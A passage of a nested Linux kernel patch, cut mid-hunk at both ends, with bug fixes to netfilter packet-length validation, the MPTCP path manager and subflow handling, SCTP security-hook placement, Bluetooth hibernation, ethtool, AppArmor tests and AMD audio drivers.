++	for (struct device_node *child __free(device_node) =		\
++	     of_get_next_child(parent, NULL);				\
++	     child != NULL;						\
++	     child = of_get_next_child(parent, child))
++
+ #define for_each_available_child_of_node(parent, child) \
+ 	for (child = of_get_next_available_child(parent, NULL); child != NULL; \
+ 	     child = of_get_next_available_child(parent, child))
+ 
++#define for_each_available_child_of_node_scoped(parent, child) \
++	for (struct device_node *child __free(device_node) =		\
++	     of_get_next_available_child(parent, NULL);			\
++	     child != NULL;						\
++	     child = of_get_next_available_child(parent, child))
++
+ #define for_each_of_cpu_node(cpu) \
+ 	for (cpu = of_get_next_cpu_node(NULL); cpu != NULL; \
+ 	     cpu = of_get_next_cpu_node(cpu))
+diff --git a/include/net/busy_poll.h b/include/net/busy_poll.h
+index f90f0021f5f2d..5387e1daa5a8b 100644
+--- a/include/net/busy_poll.h
++++ b/include/net/busy_poll.h
+@@ -63,7 +63,7 @@ static inline bool sk_can_busy_loop(struct sock *sk)
+ static inline unsigned long busy_loop_current_time(void)
+ {
+ #ifdef CONFIG_NET_RX_BUSY_POLL
+-	return (unsigned long)(local_clock() >> 10);
++	return (unsigned long)(ktime_get_ns() >> 10);
+ #else
+ 	return 0;
+ #endif
+diff --git a/include/net/netfilter/nf_tables_ipv4.h b/include/net/netfilter/nf_tables_ipv4.h
+index 5225d2bd1a6e9..10b0a7c9e721f 100644
+--- a/include/net/netfilter/nf_tables_ipv4.h
++++ b/include/net/netfilter/nf_tables_ipv4.h
+@@ -19,7 +19,7 @@ static inline void nft_set_pktinfo_ipv4(struct nft_pktinfo *pkt)
+ static inline int __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt)
+ {
+ 	struct iphdr *iph, _iph;
+-	u32 len, thoff;
++	u32 len, thoff, skb_len;
+ 
+ 	iph = skb_header_pointer(pkt->skb, skb_network_offset(pkt->skb),
+ 				 sizeof(*iph), &_iph);
+@@ -30,15 +30,17 @@ static inline int __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt)
+ 		return -1;
+ 
+ 	len = iph_totlen(pkt->skb, iph);
+-	thoff = skb_network_offset(pkt->skb) + (iph->ihl * 4);
+-	if (pkt->skb->len < len)
++	thoff = iph->ihl * 4;
++	skb_len = pkt->skb->len - skb_network_offset(pkt->skb);
++
++	if (skb_len < len)
+ 		return -1;
+ 	else if (len < thoff)
+ 		return -1;
+ 
+ 	pkt->flags = NFT_PKTINFO_L4PROTO;
+ 	pkt->tprot = iph->protocol;
+-	pkt->thoff = thoff;
++	pkt->thoff = skb_network_offset(pkt->skb) + thoff;
+ 	pkt->fragoff = ntohs(iph->frag_off) & IP_OFFSET;
+ 
+ 	return 0;
+diff --git a/include/net/netfilter/nf_tables_ipv6.h b/include/net/netfilter/nf_tables_ipv6.h
+index ec7eaeaf4f04c..f1d6a65280475 100644
+--- a/include/net/netfilter/nf_tables_ipv6.h
++++ b/include/net/netfilter/nf_tables_ipv6.h
+@@ -31,8 +31,8 @@ static inline int __nft_set_pktinfo_ipv6_validate(struct nft_pktinfo *pkt)
+ 	struct ipv6hdr *ip6h, _ip6h;
+ 	unsigned int thoff = 0;
+ 	unsigned short frag_off;
++	u32 pkt_len, skb_len;
+ 	int protohdr;
+-	u32 pkt_len;
+ 
+ 	ip6h = skb_header_pointer(pkt->skb, skb_network_offset(pkt->skb),
+ 				  sizeof(*ip6h), &_ip6h);
+@@ -43,7 +43,8 @@ static inline int __nft_set_pktinfo_ipv6_validate(struct nft_pktinfo *pkt)
+ 		return -1;
+ 
+ 	pkt_len = ntohs(ip6h->payload_len);
+-	if (pkt_len + sizeof(*ip6h) > pkt->skb->len)
++	skb_len = pkt->skb->len - skb_network_offset(pkt->skb);
++	if (pkt_len + sizeof(*ip6h) > skb_len)
+ 		return -1;
+ 
+ 	protohdr = ipv6_find_hdr(pkt->skb, &thoff, -1, &frag_off, &flags);
+diff --git a/mm/truncate.c b/mm/truncate.c
+index 0d4dd233f5187..96e9812667db2 100644
+--- a/mm/truncate.c
++++ b/mm/truncate.c
+@@ -174,7 +174,7 @@ static void truncate_cleanup_folio(struct folio *folio)
+ 	if (folio_mapped(folio))
+ 		unmap_mapping_folio(folio);
+ 
+-	if (folio_has_private(folio))
++	if (folio_needs_release(folio))
+ 		folio_invalidate(folio, 0, folio_size(folio));
+ 
+ 	/*
+@@ -235,7 +235,7 @@ bool truncate_inode_partial_folio(struct folio *folio, loff_t start, loff_t end)
+ 	 */
+ 	folio_zero_range(folio, offset, length);
+ 
+-	if (folio_has_private(folio))
++	if (folio_needs_release(folio))
+ 		folio_invalidate(folio, offset, length);
+ 	if (!folio_test_large(folio))
+ 		return true;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 210e03a3609d4..dc19a0b1a2f6d 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2405,10 +2405,16 @@ static int hci_suspend_notifier(struct notifier_block *nb, unsigned long action,
+ 	/* To avoid a potential race with hci_unregister_dev. */
+ 	hci_dev_hold(hdev);
+ 
+-	if (action == PM_SUSPEND_PREPARE)
++	switch (action) {
++	case PM_HIBERNATION_PREPARE:
++	case PM_SUSPEND_PREPARE:
+ 		ret = hci_suspend_dev(hdev);
+-	else if (action == PM_POST_SUSPEND)
++		break;
++	case PM_POST_HIBERNATION:
++	case PM_POST_SUSPEND:
+ 		ret = hci_resume_dev(hdev);
++		break;
++	}
+ 
+ 	if (ret)
+ 		bt_dev_err(hdev, "Suspend notifier action (%lu) failed: %d",
+diff --git a/net/core/net-sysfs.c b/net/core/net-sysfs.c
+index fdf3308b03350..8a06f97320e04 100644
+--- a/net/core/net-sysfs.c
++++ b/net/core/net-sysfs.c
+@@ -215,7 +215,7 @@ static ssize_t speed_show(struct device *dev,
+ 	if (!rtnl_trylock())
+ 		return restart_syscall();
+ 
+-	if (netif_running(netdev) && netif_device_present(netdev)) {
++	if (netif_running(netdev)) {
+ 		struct ethtool_link_ksettings cmd;
+ 
+ 		if (!__ethtool_get_link_ksettings(netdev, &cmd))
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index e31d1247b9f08..442c4c343e155 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -445,6 +445,9 @@ int __ethtool_get_link_ksettings(struct net_device *dev,
+ 	if (!dev->ethtool_ops->get_link_ksettings)
+ 		return -EOPNOTSUPP;
+ 
++	if (!netif_device_present(dev))
++		return -ENODEV;
++
+ 	memset(link_ksettings, 0, sizeof(*link_ksettings));
+ 	return dev->ethtool_ops->get_link_ksettings(dev, link_ksettings);
+ }
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index a27ee627addef..5646c7275a92d 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -59,16 +59,6 @@ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_
+ 	return 0;
+ }
+ 
+-int mptcp_pm_remove_subflow(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list)
+-{
+-	pr_debug("msk=%p, rm_list_nr=%d", msk, rm_list->nr);
+-
+-	spin_lock_bh(&msk->pm.lock);
+-	mptcp_pm_nl_rm_subflow_received(msk, rm_list);
+-	spin_unlock_bh(&msk->pm.lock);
+-	return 0;
+-}
+-
+ /* path manager event handlers */
+ 
+ void mptcp_pm_new_connection(struct mptcp_sock *msk, const struct sock *ssk, int server_side)
+@@ -235,7 +225,9 @@ void mptcp_pm_add_addr_received(const struct sock *ssk,
+ 		} else {
+ 			__MPTCP_INC_STATS(sock_net((struct sock *)msk), MPTCP_MIB_ADDADDRDROP);
+ 		}
+-	} else if (!READ_ONCE(pm->accept_addr)) {
++	/* id0 should not have a different address */
++	} else if ((addr->id == 0 && !mptcp_pm_nl_is_init_remote_addr(msk, addr)) ||
++		   (addr->id > 0 && !READ_ONCE(pm->accept_addr))) {
+ 		mptcp_pm_announce_addr(msk, addr, true);
+ 		mptcp_pm_add_addr_send_ack(msk);
+ 	} else if (mptcp_pm_schedule_work(msk, MPTCP_PM_ADD_ADDR_RECEIVED)) {
+@@ -413,7 +405,23 @@ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ 
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ {
+-	return mptcp_pm_nl_get_local_id(msk, skc);
++	struct mptcp_addr_info skc_local;
++	struct mptcp_addr_info msk_local;
++
++	if (WARN_ON_ONCE(!msk))
++		return -1;
++
++	/* The 0 ID mapping is defined by the first subflow, copied into the msk
++	 * addr
++	 */
++	mptcp_local_address((struct sock_common *)msk, &msk_local);
++	mptcp_local_address((struct sock_common *)skc, &skc_local);
++	if (mptcp_addresses_equal(&msk_local, &skc_local, false))
++		return 0;
++
++	if (mptcp_pm_is_userspace(msk))
++		return mptcp_userspace_pm_get_local_id(msk, &skc_local);
++	return mptcp_pm_nl_get_local_id(msk, &skc_local);
+ }
+ 
+ bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc)
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 2bce3a32bd881..9e16ae1b23fc7 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -134,12 +134,15 @@ static bool lookup_subflow_by_daddr(const struct list_head *list,
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_addr_info cur;
+-	struct sock_common *skc;
+ 
+ 	list_for_each_entry(subflow, list, node) {
+-		skc = (struct sock_common *)mptcp_subflow_tcp_sock(subflow);
++		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++
++		if (!((1 << inet_sk_state_load(ssk)) &
++		      (TCPF_ESTABLISHED | TCPF_SYN_SENT | TCPF_SYN_RECV)))
++			continue;
+ 
+-		remote_address(skc, &cur);
++		remote_address((struct sock_common *)ssk, &cur);
+ 		if (mptcp_addresses_equal(&cur, daddr, daddr->port))
+ 			return true;
+ 	}
+@@ -736,6 +739,15 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	}
+ }
+ 
++bool mptcp_pm_nl_is_init_remote_addr(struct mptcp_sock *msk,
++				     const struct mptcp_addr_info *remote)
++{
++	struct mptcp_addr_info mpc_remote;
++
++	remote_address((struct sock_common *)msk, &mpc_remote);
++	return mptcp_addresses_equal(&mpc_remote, remote, remote->port);
++}
++
+ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk)
+ {
+ 	struct mptcp_subflow_context *subflow;
+@@ -747,9 +759,12 @@ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk)
+ 	    !mptcp_pm_should_rm_signal(msk))
+ 		return;
+ 
+-	subflow = list_first_entry_or_null(&msk->conn_list, typeof(*subflow), node);
+-	if (subflow)
+-		mptcp_pm_send_ack(msk, subflow, false, false);
++	mptcp_for_each_subflow(msk, subflow) {
++		if (__mptcp_subflow_active(subflow)) {
++			mptcp_pm_send_ack(msk, subflow, false, false);
++			break;
++		}
++	}
+ }
+ 
+ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+@@ -819,6 +834,8 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			int how = RCV_SHUTDOWN | SEND_SHUTDOWN;
+ 			u8 id = subflow_get_local_id(subflow);
+ 
++			if (inet_sk_state_load(ssk) == TCP_CLOSE)
++				continue;
+ 			if (rm_type == MPTCP_MIB_RMADDR && remote_id != rm_id)
+ 				continue;
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW && !mptcp_local_id_match(msk, id, rm_id))
+@@ -838,10 +855,10 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW)
+ 				__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		}
+-		if (rm_type == MPTCP_MIB_RMSUBFLOW)
+-			__set_bit(rm_id ? rm_id : msk->mpc_endpoint_id, msk->pm.id_avail_bitmap);
+-		else if (rm_type == MPTCP_MIB_RMADDR)
++
++		if (rm_type == MPTCP_MIB_RMADDR)
+ 			__MPTCP_INC_STATS(sock_net(sk), rm_type);
++
+ 		if (!removed)
+ 			continue;
+ 
+@@ -853,10 +870,8 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			/* Note: if the subflow has been closed before, this
+ 			 * add_addr_accepted counter will not be decremented.
+ 			 */
+-			msk->pm.add_addr_accepted--;
+-			WRITE_ONCE(msk->pm.accept_addr, true);
+-		} else if (rm_type == MPTCP_MIB_RMSUBFLOW) {
+-			msk->pm.local_addr_used--;
++			if (--msk->pm.add_addr_accepted < mptcp_pm_get_add_addr_accept_max(msk))
++				WRITE_ONCE(msk->pm.accept_addr, true);
+ 		}
+ 	}
+ }
+@@ -866,8 +881,8 @@ static void mptcp_pm_nl_rm_addr_received(struct mptcp_sock *msk)
+ 	mptcp_pm_nl_rm_addr_or_subflow(msk, &msk->pm.rm_list_rx, MPTCP_MIB_RMADDR);
+ }
+ 
+-void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
+-				     const struct mptcp_rm_list *rm_list)
++static void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
++					    const struct mptcp_rm_list *rm_list)
+ {
+ 	mptcp_pm_nl_rm_addr_or_subflow(msk, rm_list, MPTCP_MIB_RMSUBFLOW);
+ }
+@@ -1074,33 +1089,17 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	return 0;
+ }
+ 
+-int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
++int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc)
+ {
+ 	struct mptcp_pm_addr_entry *entry;
+-	struct mptcp_addr_info skc_local;
+-	struct mptcp_addr_info msk_local;
+ 	struct pm_nl_pernet *pernet;
+ 	int ret = -1;
+ 
+-	if (WARN_ON_ONCE(!msk))
+-		return -1;
+-
+-	/* The 0 ID mapping is defined by the first subflow, copied into the msk
+-	 * addr
+-	 */
+-	mptcp_local_address((struct sock_common *)msk, &msk_local);
+-	mptcp_local_address((struct sock_common *)skc, &skc_local);
+-	if (mptcp_addresses_equal(&msk_local, &skc_local, false))
+-		return 0;
+-
+-	if (mptcp_pm_is_userspace(msk))
+-		return mptcp_userspace_pm_get_local_id(msk, &skc_local);
+-
+ 	pernet = pm_nl_get_pernet_from_msk(msk);
+ 
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(entry, &pernet->local_addr_list, list) {
+-		if (mptcp_addresses_equal(&entry->addr, &skc_local, entry->addr.port)) {
++		if (mptcp_addresses_equal(&entry->addr, skc, entry->addr.port)) {
+ 			ret = entry->addr.id;
+ 			break;
+ 		}
+@@ -1114,7 +1113,7 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	if (!entry)
+ 		return -ENOMEM;
+ 
+-	entry->addr = skc_local;
++	entry->addr = *skc;
+ 	entry->addr.id = 0;
+ 	entry->addr.port = 0;
+ 	entry->ifindex = 0;
+@@ -1328,20 +1327,27 @@ static struct pm_nl_pernet *genl_info_pm_nl(struct genl_info *info)
+ 	return pm_nl_get_pernet(genl_info_net(info));
+ }
+ 
+-static int mptcp_nl_add_subflow_or_signal_addr(struct net *net)
++static int mptcp_nl_add_subflow_or_signal_addr(struct net *net,
++					       struct mptcp_addr_info *addr)
+ {
+ 	struct mptcp_sock *msk;
+ 	long s_slot = 0, s_num = 0;
+ 
+ 	while ((msk = mptcp_token_iter_next(net, &s_slot, &s_num)) != NULL) {
+ 		struct sock *sk = (struct sock *)msk;
++		struct mptcp_addr_info mpc_addr;
+ 
+ 		if (!READ_ONCE(msk->fully_established) ||
+ 		    mptcp_pm_is_userspace(msk))
+ 			goto next;
+ 
++		/* if the endp linked to the init sf is re-added with a != ID */
++		mptcp_local_address((struct sock_common *)msk, &mpc_addr);
++
+ 		lock_sock(sk);
+ 		spin_lock_bh(&msk->pm.lock);
++		if (mptcp_addresses_equal(addr, &mpc_addr, addr->port))
++			msk->mpc_endpoint_id = addr->id;
+ 		mptcp_pm_create_subflow_or_signal_addr(msk);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 		release_sock(sk);
+@@ -1414,7 +1420,7 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 		goto out_free;
+ 	}
+ 
+-	mptcp_nl_add_subflow_or_signal_addr(sock_net(skb->sk));
++	mptcp_nl_add_subflow_or_signal_addr(sock_net(skb->sk), &entry->addr);
+ 	return 0;
+ 
+ out_free:
+@@ -1488,6 +1494,14 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	return ret;
+ }
+ 
++static void __mark_subflow_endp_available(struct mptcp_sock *msk, u8 id)
++{
++	/* If it was marked as used, and not ID 0, decrement local_addr_used */
++	if (!__test_and_set_bit(id ? : msk->mpc_endpoint_id, msk->pm.id_avail_bitmap) &&
++	    id && !WARN_ON_ONCE(msk->pm.local_addr_used == 0))
++		msk->pm.local_addr_used--;
++}
++
+ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 						   const struct mptcp_pm_addr_entry *entry)
+ {
+@@ -1518,15 +1532,19 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 					  !(entry->flags & MPTCP_PM_ADDR_FLAG_IMPLICIT));
+ 
+ 		if (remove_subflow) {
+-			mptcp_pm_remove_subflow(msk, &list);
+-		} else if (entry->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW) {
+-			/* If the subflow has been used, but now closed */
+ 			spin_lock_bh(&msk->pm.lock);
+-			if (!__test_and_set_bit(entry->addr.id, msk->pm.id_avail_bitmap))
+-				msk->pm.local_addr_used--;
++			mptcp_pm_nl_rm_subflow_received(msk, &list);
++			spin_unlock_bh(&msk->pm.lock);
++		}
++
++		if (entry->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW) {
++			spin_lock_bh(&msk->pm.lock);
++			__mark_subflow_endp_available(msk, list.ids[0]);
+ 			spin_unlock_bh(&msk->pm.lock);
+ 		}
+ 
++		if (msk->mpc_endpoint_id == entry->addr.id)
++			msk->mpc_endpoint_id = 0;
+ 		release_sock(sk);
+ 
+ next:
+@@ -1561,6 +1579,7 @@ static int mptcp_nl_remove_id_zero_address(struct net *net,
+ 		spin_lock_bh(&msk->pm.lock);
+ 		mptcp_pm_remove_addr(msk, &list);
+ 		mptcp_pm_nl_rm_subflow_received(msk, &list);
++		__mark_subflow_endp_available(msk, 0);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 		release_sock(sk);
+ 
+@@ -1664,18 +1683,14 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 			alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
++	spin_lock_bh(&msk->pm.lock);
+ 	if (alist.nr) {
+-		spin_lock_bh(&msk->pm.lock);
+ 		msk->pm.add_addr_signaled -= alist.nr;
+ 		mptcp_pm_remove_addr(msk, &alist);
+-		spin_unlock_bh(&msk->pm.lock);
+ 	}
+-
+ 	if (slist.nr)
+-		mptcp_pm_remove_subflow(msk, &slist);
+-
++		mptcp_pm_nl_rm_subflow_received(msk, &slist);
+ 	/* Reset counters: maybe some subflows have been removed before */
+-	spin_lock_bh(&msk->pm.lock);
+ 	bitmap_fill(msk->pm.id_avail_bitmap, MPTCP_PM_MAX_ADDR_ID + 1);
+ 	msk->pm.local_addr_used = 0;
+ 	spin_unlock_bh(&msk->pm.lock);
+@@ -1957,6 +1972,7 @@ static void mptcp_pm_nl_fullmesh(struct mptcp_sock *msk,
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	mptcp_pm_nl_rm_subflow_received(msk, &list);
++	__mark_subflow_endp_available(msk, list.ids[0]);
+ 	mptcp_pm_create_subflow_or_signal_addr(msk);
+ 	spin_unlock_bh(&msk->pm.lock);
+ }
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 75ae91c931294..258dbfe9fad30 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2309,7 +2309,7 @@ static struct sock *mptcp_subflow_get_retrans(struct mptcp_sock *msk)
+ 			continue;
+ 		}
+ 
+-		if (subflow->backup) {
++		if (subflow->backup || subflow->request_bkup) {
+ 			if (!backup)
+ 				backup = ssk;
+ 			continue;
+@@ -2528,8 +2528,11 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 
+ 	mptcp_for_each_subflow_safe(msk, subflow, tmp) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++		int ssk_state = inet_sk_state_load(ssk);
+ 
+-		if (inet_sk_state_load(ssk) != TCP_CLOSE)
++		if (ssk_state != TCP_CLOSE &&
++		    (ssk_state != TCP_CLOSE_WAIT ||
++		     inet_sk_state_load(sk) != TCP_ESTABLISHED))
+ 			continue;
+ 
+ 		/* 'subflow_data_ready' will re-sched once rx queue is empty */
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 4515cc6b649fc..c3cd68edab779 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -802,6 +802,8 @@ void mptcp_pm_add_addr_received(const struct sock *ssk,
+ void mptcp_pm_add_addr_echoed(struct mptcp_sock *msk,
+ 			      const struct mptcp_addr_info *addr);
+ void mptcp_pm_add_addr_send_ack(struct mptcp_sock *msk);
++bool mptcp_pm_nl_is_init_remote_addr(struct mptcp_sock *msk,
++				     const struct mptcp_addr_info *remote);
+ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk);
+ void mptcp_pm_rm_addr_received(struct mptcp_sock *msk,
+ 			       const struct mptcp_rm_list *rm_list);
+@@ -834,7 +836,6 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ 			   const struct mptcp_addr_info *addr,
+ 			   bool echo);
+ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+-int mptcp_pm_remove_subflow(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list);
+@@ -912,6 +913,7 @@ bool mptcp_pm_add_addr_signal(struct mptcp_sock *msk, const struct sk_buff *skb,
+ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ 			     struct mptcp_rm_list *rm_list);
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
++int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc);
+ bool mptcp_pm_nl_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+@@ -928,9 +930,6 @@ static inline u8 subflow_get_local_id(const struct mptcp_subflow_context *subflo
+ 
+ void __init mptcp_pm_nl_init(void);
+ void mptcp_pm_nl_work(struct mptcp_sock *msk);
+-void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
+-				     const struct mptcp_rm_list *rm_list);
+-int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
+ unsigned int mptcp_pm_get_add_addr_signal_max(const struct mptcp_sock *msk);
+ unsigned int mptcp_pm_get_add_addr_accept_max(const struct mptcp_sock *msk);
+ unsigned int mptcp_pm_get_subflows_max(const struct mptcp_sock *msk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index b47673b370279..1a92c8edd0a0e 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1137,12 +1137,16 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ /* sched mptcp worker to remove the subflow if no more data is pending */
+ static void subflow_sched_work_if_closed(struct mptcp_sock *msk, struct sock *ssk)
+ {
+-	if (likely(ssk->sk_state != TCP_CLOSE))
++	struct sock *sk = (struct sock *)msk;
++
++	if (likely(ssk->sk_state != TCP_CLOSE &&
++		   (ssk->sk_state != TCP_CLOSE_WAIT ||
++		    inet_sk_state_load(sk) != TCP_ESTABLISHED)))
+ 		return;
+ 
+ 	if (skb_queue_empty(&ssk->sk_receive_queue) &&
+ 	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+-		mptcp_schedule_work((struct sock *)msk);
++		mptcp_schedule_work(sk);
+ }
+ 
+ static bool subflow_can_fallback(struct mptcp_subflow_context *subflow)
+diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
+index 5383b6a9da61c..a56749a50e5c5 100644
+--- a/net/sctp/sm_statefuns.c
++++ b/net/sctp/sm_statefuns.c
+@@ -2261,12 +2261,6 @@ enum sctp_disposition sctp_sf_do_5_2_4_dupcook(
+ 		}
+ 	}
+ 
+-	/* Update socket peer label if first association. */
+-	if (security_sctp_assoc_request(new_asoc, chunk->head_skb ?: chunk->skb)) {
+-		sctp_association_free(new_asoc);
+-		return sctp_sf_pdiscard(net, ep, asoc, type, arg, commands);
+-	}
+-
+ 	/* Set temp so that it won't be added into hashtable */
+ 	new_asoc->temp = 1;
+ 
+@@ -2275,6 +2269,22 @@ enum sctp_disposition sctp_sf_do_5_2_4_dupcook(
+ 	 */
+ 	action = sctp_tietags_compare(new_asoc, asoc);
+ 
++	/* In cases C and E the association doesn't enter the ESTABLISHED
++	 * state, so there is no need to call security_sctp_assoc_request().
++	 */
++	switch (action) {
++	case 'A': /* Association restart. */
++	case 'B': /* Collision case B. */
++	case 'D': /* Collision case D. */
++		/* Update socket peer label if first association. */
++		if (security_sctp_assoc_request((struct sctp_association *)asoc,
++						chunk->head_skb ?: chunk->skb)) {
++			sctp_association_free(new_asoc);
++			return sctp_sf_pdiscard(net, ep, asoc, type, arg, commands);
++		}
++		break;
++	}
++
+ 	switch (action) {
+ 	case 'A': /* Association restart. */
+ 		retval = sctp_sf_do_dupcook_a(net, ep, asoc, chunk, commands,
+diff --git a/security/apparmor/policy_unpack_test.c b/security/apparmor/policy_unpack_test.c
+index f25cf2a023d57..0711a0305df34 100644
+--- a/security/apparmor/policy_unpack_test.c
++++ b/security/apparmor/policy_unpack_test.c
+@@ -81,14 +81,14 @@ static struct aa_ext *build_aa_ext_struct(struct policy_unpack_fixture *puf,
+ 	*(buf + 1) = strlen(TEST_U32_NAME) + 1;
+ 	strcpy(buf + 3, TEST_U32_NAME);
+ 	*(buf + 3 + strlen(TEST_U32_NAME) + 1) = AA_U32;
+-	*((u32 *)(buf + 3 + strlen(TEST_U32_NAME) + 2)) = TEST_U32_DATA;
++	*((__le32 *)(buf + 3 + strlen(TEST_U32_NAME) + 2)) = cpu_to_le32(TEST_U32_DATA);
+ 
+ 	buf = e->start + TEST_NAMED_U64_BUF_OFFSET;
+ 	*buf = AA_NAME;
+ 	*(buf + 1) = strlen(TEST_U64_NAME) + 1;
+ 	strcpy(buf + 3, TEST_U64_NAME);
+ 	*(buf + 3 + strlen(TEST_U64_NAME) + 1) = AA_U64;
+-	*((u64 *)(buf + 3 + strlen(TEST_U64_NAME) + 2)) = TEST_U64_DATA;
++	*((__le64 *)(buf + 3 + strlen(TEST_U64_NAME) + 2)) = cpu_to_le64(TEST_U64_DATA);
+ 
+ 	buf = e->start + TEST_NAMED_BLOB_BUF_OFFSET;
+ 	*buf = AA_NAME;
+@@ -104,7 +104,7 @@ static struct aa_ext *build_aa_ext_struct(struct policy_unpack_fixture *puf,
+ 	*(buf + 1) = strlen(TEST_ARRAY_NAME) + 1;
+ 	strcpy(buf + 3, TEST_ARRAY_NAME);
+ 	*(buf + 3 + strlen(TEST_ARRAY_NAME) + 1) = AA_ARRAY;
+-	*((u16 *)(buf + 3 + strlen(TEST_ARRAY_NAME) + 2)) = TEST_ARRAY_SIZE;
++	*((__le16 *)(buf + 3 + strlen(TEST_ARRAY_NAME) + 2)) = cpu_to_le16(TEST_ARRAY_SIZE);
+ 
+ 	return e;
+ }
+diff --git a/sound/soc/amd/acp/acp-legacy-mach.c b/sound/soc/amd/acp/acp-legacy-mach.c
+index 1f4878ff7d372..2f98f3da0ad0b 100644
+--- a/sound/soc/amd/acp/acp-legacy-mach.c
++++ b/sound/soc/amd/acp/acp-legacy-mach.c
+@@ -144,6 +144,8 @@ static const struct platform_device_id board_ids[] = {
+ 	},
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(platform, board_ids);
++
+ static struct platform_driver acp_asoc_audio = {
+ 	.driver = {
+ 		.pm = &snd_soc_pm_ops,
+diff --git a/sound/soc/sof/amd/acp.c b/sound/soc/sof/amd/acp.c
+index f8d2372a758f4..e4e046d4778e2 100644
+--- a/sound/soc/sof/amd/acp.c
++++ b/sound/soc/sof/amd/acp.c
+@@ -363,6 +363,7 @@ static int acp_power_on(struct snd_sof_dev *sdev)
+ 	const struct sof_amd_acp_desc *desc = get_chip_info(sdev->pdata);
+ 	unsigned int base = desc->pgfsm_base;
+ 	unsigned int val;
++	unsigned int acp_pgfsm_status_mask, acp_pgfsm_cntl_mask;
+ 	int ret;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + PGFSM_STATUS_OFFSET);
+@@ -370,9 +371,23 @@ static int acp_power_on(struct snd_sof_dev *sdev)
+ 	if (val == ACP_POWERED_ON)
+ 		return 0;
+ 
